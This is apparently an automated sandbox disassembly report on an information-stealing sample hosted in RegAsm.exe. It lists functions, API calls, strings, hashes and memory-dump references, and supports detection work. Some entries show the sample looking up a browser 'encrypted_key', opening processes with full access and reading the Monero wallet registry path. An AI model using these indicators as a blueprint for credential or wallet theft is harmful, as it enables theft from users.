String ID: , c%d$config$content$docsize$id INTEGER PRIMARY KEY$id INTEGER PRIMARY KEY, sz BLOB$id INTEGER PRIMARY KEY, sz BLOB, origin INTEGER$k PRIMARY KEY, v$version
API String ID: 0-3918257174
Opcode ID: c8f02a8b8474d148238157bf580d88b0400e253f3a23638fea341b9d4acacfb7
Instruction ID: 6ca1a6a23e49a8d6a94d80afb0a7e86debebffe87c469c56728b14a184600c34
Opcode Fuzzy Hash: c8f02a8b8474d148238157bf580d88b0400e253f3a23638fea341b9d4acacfb7
Instruction Fuzzy Hash: 5C5113729012219BD710AF28DC81BDBB7A8EF84765F45822DFC449B341D735EA19CBE1

Function 1B518F40 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 177COMMON

Download Yara Rule

Strings

%!.15g, xrefs: 1B518F83
NULL, xrefs: 1B51912E
%!.20e, xrefs: 1B518FF1
NULL, xrefs: 1B519148
%lld, xrefs: 1B51900C

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %!.15g$%!.20e$%lld$NULL$NULL
API String ID: 0-2115304644
Opcode ID: be5c1c8cc8143a8c855b3918f78d04b805010412df727da47c3c950b3c734459
Instruction ID: 0e6ea403a84bbca0fab12ece87c9d6012934649ad224d841d3e50540ae11397c
Opcode Fuzzy Hash: be5c1c8cc8143a8c855b3918f78d04b805010412df727da47c3c950b3c734459
Instruction Fuzzy Hash: 0C51347A904B115BFB11DF18CC41ADBB7F8EF81304F45498DE8D96B202E336E95687A2

Function 1B3E3420 Relevance: 21.4, APIs: 6, Strings: 6, Instructions: 392COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B3E3517
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B3E3548, 1B3E3594
%s at line %d of [%.10s], xrefs: 1B3E3557, 1B3E35A3
misuse, xrefs: 1B3E3552, 1B3E359E
ATTACH x AS %Q, xrefs: 1B3E346F
API called with finalized prepared statement, xrefs: 1B3E352C, 1B3E3588

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ATTACH x AS %Q$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-2988319395
Opcode ID: 985551317a0b6cbfd0c15b16131e6058a96957fbfc3b305e9d82c05dee2f3b17
Instruction ID: 0f4d1b86a99cbcc8f88b00dc11b8075a7a84ab1fd20e9f9e2a6bd688a3fdad65
Opcode Fuzzy Hash: 985551317a0b6cbfd0c15b16131e6058a96957fbfc3b305e9d82c05dee2f3b17
Instruction Fuzzy Hash: 22D1D3B4900351ABE7128F24CCC5BDB77E8BF94305F44462EE89996341E735E568CBB2

Function 1B4B4B10 Relevance: 21.2, APIs: 5, Strings: 7, Instructions: 156COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4B4C2A
%s at line %d of [%.10s], xrefs: 1B4B4C39
misuse, xrefs: 1B4B4C34
API called with finalized prepared statement, xrefs: 1B4B4C1E
SELECT * FROM %Q.%Q, xrefs: 1B4B4B25
UNIQUE constraint failed: %s.%s, xrefs: 1B4B4BC9
rtree constraint failed: %s.(%s<=%s), xrefs: 1B4B4BF9

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with finalized prepared statement$SELECT * FROM %Q.%Q$UNIQUE constraint failed: %s.%s$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$rtree constraint failed: %s.(%s<=%s)
API String ID: 0-2013246442
Opcode ID: ec94869a11f0586f1e6d8761de691ec2b27f13d61ae145789a14da09324d2e4b
Instruction ID: 7b61cbc3d2c34c0fc2301fb7d184099b55fb6fb16e1e08e2df338b14c31cdb53
Opcode Fuzzy Hash: ec94869a11f0586f1e6d8761de691ec2b27f13d61ae145789a14da09324d2e4b
Instruction Fuzzy Hash: 184156B2900215AFFB009F659D86FDB73ACEF90705F04862DFE4496340EB21E95886B2

Function 1B567C10 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 150COMMON

Download Yara Rule

Strings

winFullPathname2, xrefs: 1B567D35
winFullPathname1, xrefs: 1B567CC9
%s%c%s, xrefs: 1B567C7A

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s%c%s$winFullPathname1$winFullPathname2
API String ID: 0-2846052723
Opcode ID: bb4cb3b8e9793d248fb8184dbad369177e8425197b97638b75f92c51974ea6c3
Instruction ID: 86df4e673747e0d63bb48aab908bb7b2a328a758d8c742a3b0dcd846a3115051
Opcode Fuzzy Hash: bb4cb3b8e9793d248fb8184dbad369177e8425197b97638b75f92c51974ea6c3
Instruction Fuzzy Hash: 2D416CB69043412BFB115B30FC82FE777AD9F857A5F44096DFC8A55081F612E886C262

Function 1B55AAD0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 130COMMON

Download Yara Rule

Strings

ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B55AB0B, 1B55AB4C, 1B55ABA0
API called with NULL prepared statement, xrefs: 1B55AAD9
%s at line %d of [%.10s], xrefs: 1B55AB1A, 1B55AB5B, 1B55ABAF
bind on a busy prepared statement: [%s], xrefs: 1B55AB94
misuse, xrefs: 1B55AB15, 1B55AB56, 1B55ABAA
API called with finalized prepared statement, xrefs: 1B55AAEF

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$bind on a busy prepared statement: [%s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-3679126755
Opcode ID: 53fd683f9ac757d3bbf637ba936208e38bda9d0797ff727e79b64887eb8c8120
Instruction ID: 121b00c84df0c1f4f60c289545caf4b62845290a385db8d7c670aea28aadebb2
Opcode Fuzzy Hash: 53fd683f9ac757d3bbf637ba936208e38bda9d0797ff727e79b64887eb8c8120
Instruction Fuzzy Hash: 7841E2716007049BFB10DF68EC96FC6B6A5AF94317F09042EF5959B381E770E990C7A1

Function 004139FA Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 004139FF
memset.MSVCRT ref: 00413A20
memset.MSVCRT ref: 00413A2E

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

lstrcat.KERNEL32(?,00000000), ref: 00413A5A
lstrcat.KERNEL32(?), ref: 00413A78
lstrcat.KERNEL32(?,?), ref: 00413A8C
lstrcat.KERNEL32(?), ref: 00413A9F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 00411986: _EH_prolog.MSVCRT ref: 0041198B
Part of subcall function 00411986: GetFileAttributesA.KERNEL32(00000000,?,0040C604,?,00426CD2,?,?), ref: 0041199F

Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6

Part of subcall function 0040CCC8: _EH_prolog.MSVCRT ref: 0040CCCD
Part of subcall function 0040CCC8: StrStrA.SHLWAPI(00000000,"encrypted_key":",?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040CD1F
Part of subcall function 0040CCC8: memcmp.MSVCRT ref: 0040CD5D

Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E

Part of subcall function 00411C41: GlobalAlloc.KERNEL32(00000000,-;A,00000000,00000000,?,00413B2D,?,?), ref: 00411C4C

StrStrA.SHLWAPI(00000000), ref: 00413B39
GlobalFree.KERNEL32(?), ref: 00413C08

Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406D9F
Part of subcall function 00406D7F: LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
Part of subcall function 00406D7F: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
Part of subcall function 00406D7F: LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

Part of subcall function 00406EF1: _EH_prolog.MSVCRT ref: 00406EF6
Part of subcall function 00406EF1: memcmp.MSVCRT ref: 00406F1C
Part of subcall function 00406EF1: memset.MSVCRT ref: 00406F4B
Part of subcall function 00406EF1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406F80

lstrcat.KERNEL32(?,00000000), ref: 00413BAE
StrCmpCA.SHLWAPI(?,004276DE,?,?,?,?,000003E8), ref: 00413BCB
lstrcat.KERNEL32(?,?), ref: 00413BE4
lstrcat.KERNEL32(?,004279B4), ref: 00413BF2

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 174962345-0
Opcode ID: e002c41eeed84b99df8feeeaf42a2b1855fca99a615ae38258e60422bd9ffc46
Instruction ID: 9d77250c286e468091d57001092ab5af1cd44c753de743fd02799ef876a1edc2
Opcode Fuzzy Hash: e002c41eeed84b99df8feeeaf42a2b1855fca99a615ae38258e60422bd9ffc46
Instruction Fuzzy Hash: E8610CB2D00119ABCF10EFE1DD85DDEBBBDAB09304F10046AF615F3151EA399A94CBA5

Function 1B485470 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 225COMMON

Download Yara Rule

Strings

JSON cannot hold BLOB values, xrefs: 1B485697
%lld, xrefs: 1B48550D
%!0.15g, xrefs: 1B4854D2

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %!0.15g$%lld$JSON cannot hold BLOB values
API String ID: 0-1047910854
Opcode ID: ee3d3e84144b1b214f9b14101e26a85ca932c66e5865de390d5baa7a5cce62bb
Instruction ID: c2697d7e170cfa9d634adc0384f10ab7464d7bfaabe64e674616ca9417ecf841
Opcode Fuzzy Hash: ee3d3e84144b1b214f9b14101e26a85ca932c66e5865de390d5baa7a5cce62bb
Instruction Fuzzy Hash: C951CE7B5002007AEB105B98DC42FFE77AADF82335F14424DF98556386EB67A56182E2

Function 1B402B70 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 183COMMON

Download Yara Rule

Strings

%c"%s", xrefs: 1B402C1B
,schema HIDDEN, xrefs: 1B402CD2
("%s", xrefs: 1B402C4A
ABLE x, xrefs: 1B402BB6
,arg HIDDEN, xrefs: 1B402C7A

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %c"%s"$("%s"$,arg HIDDEN$,schema HIDDEN$ABLE x
API String ID: 0-1763475469
Opcode ID: aef557bd22dbe9015c82dbff9e2bba389d143d34df134f673601be4e68453ce0
Instruction ID: 8043d22cdd05b8b36bf75c301fa07367991655b74a9152175969a82c95f51f96
Opcode Fuzzy Hash: aef557bd22dbe9015c82dbff9e2bba389d143d34df134f673601be4e68453ce0
Instruction Fuzzy Hash: 0E718175808342DBD744CF24D855BDAF7E4FF98304F008A6EE88897281E775E949CB52

Function 00410332 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 172COMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00410337
??_U@YAPAXI@Z.MSVCRT ref: 0041034D
OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000), ref: 0041036F
memset.MSVCRT ref: 004103B1
??_V@YAXPAX@Z.MSVCRT ref: 004104EA

Part of subcall function 0040EC9A: strlen.MSVCRT ref: 0040ECB1

Part of subcall function 0040E854: memcpy.MSVCRT ref: 0040E874

Strings

65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 004103C9, 004104B2
N0ZWFt, xrefs: 00410454, 00410461

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: H_prologOpenProcessmemcpymemsetstrlen
String ID: 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30$N0ZWFt
API String ID: 3050127167-1622206642
Opcode ID: 35d3ffc30f792bc24855a2515d73b3d51e9434b796feb933c21a250eb6990103
Instruction ID: 01e259c1b9f3d21e9a27b26ae11b4f6e53cc13dfbc369e3e5617e9ccf329a681
Opcode Fuzzy Hash: 35d3ffc30f792bc24855a2515d73b3d51e9434b796feb933c21a250eb6990103
Instruction Fuzzy Hash: 37518F7194421DAEDB10EF91DC85AEEBB79EB04314F20007FF115A6281DAB95EC8CB69

Function 1B47AA40 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 334COMMON

Download Yara Rule

Strings

API called with NULL prepared statement, xrefs: 1B47AA87
ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B47AAB8, 1B47AD82
%s at line %d of [%.10s], xrefs: 1B47AAC7, 1B47AD91
misuse, xrefs: 1B47AAC2, 1B47AD8C
API called with finalized prepared statement, xrefs: 1B47AA9C, 1B47AD76

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$API called with NULL prepared statement$API called with finalized prepared statement$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
API String ID: 0-860711957
Opcode ID: 716743c71e1ea4f33b561e8553a1615ae13c1d9030aeb2b9fcbeb5681a8a1382
Instruction ID: ab401e26c013009fcaadbacbdcbf45d307ee8ba3cecd5cbf6be55aa8a07822ab
Opcode Fuzzy Hash: 716743c71e1ea4f33b561e8553a1615ae13c1d9030aeb2b9fcbeb5681a8a1382
Instruction Fuzzy Hash: B5B148B5A00741AFEB10AFA4DC45BDB73D9AF4031AF04852CE9968B381E775F449C7A2

Function 1B403D20 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 223COMMON

Download Yara Rule

Strings

%Q., xrefs: 1B403E11
PRAGMA , xrefs: 1B403DC5
=%Q, xrefs: 1B403E7F

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: %Q.$=%Q$PRAGMA
API String ID: 0-2099833060
Opcode ID: fab5e2f52bba3f41407010dd50828ab7b1819f1f85f9006da3340ade656373ed
Instruction ID: e2a3eefecacd23343a31dc0ab4e728697e70b5638ea0d1d3111b5ab9c5bc2754
Opcode Fuzzy Hash: fab5e2f52bba3f41407010dd50828ab7b1819f1f85f9006da3340ade656373ed
Instruction Fuzzy Hash: A671F5769043019BDB00CF24DCC5BDBBBA8AF98315F44866DF8859B341DB35E9198BE2

Function 00401C6B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 179stringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 00401C70
memset.MSVCRT ref: 00401C8E

Part of subcall function 00401000: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401014
Part of subcall function 00401000: HeapAlloc.KERNEL32(00000000,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 0040101B
Part of subcall function 00401000: RegOpenKeyExA.ADVAPI32(000000FF,00000000,00000000,00020119,?,?,?,?,00401CA7,80000001,SOFTWARE\monero-project\monero-core,wallet_path,?,00000000), ref: 00401034
